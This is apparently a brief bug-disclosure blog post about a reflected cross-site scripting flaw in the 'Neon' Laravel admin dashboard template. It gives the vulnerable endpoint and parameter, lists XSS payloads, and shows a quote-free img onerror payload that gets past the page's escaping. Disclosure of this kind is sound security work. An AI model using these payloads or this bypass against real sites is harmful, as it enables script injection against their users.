Neon is Feature packed & powerful Admin dashboard
with UI Kit. It is built on Latest Bootstrap version, Latest Laravel
version, PHP, HTML5 , CSS3 and jQuery. All elements are handcrafted full
precision as well customizable as per requirements. The Admin Dashboard
is Fully Responsive and gives full flexibility to developer to
customize it. It consists of 3 Unique Dashboard Layouts, 80+ Inner Pages
and 7+ Modern Icon Sets. We are very supportive of our client base.
Please, Feel free to contact us in case of any query.
FULL POC :
/data/autosuggest-remote.php
add (q) parameter in this page
EX : (http://localhost/neon/data/autosuggest-remote.php?q=hi)
Now i will get xss bug
Lets Try This Payloads
<script>alert(1)</script>
<img src="x" onerror="alert(1)">
Not working
worked but not executed ..hmm why ??
this code of page .. the programmer add \ in double cote and /
hmm lets bypass it using img tag without double cote
<img src=x onerror=alert('@Knassar702')>BOOOM Worked :)
My Report
my links :
Github
CVE
Comments
Post a Comment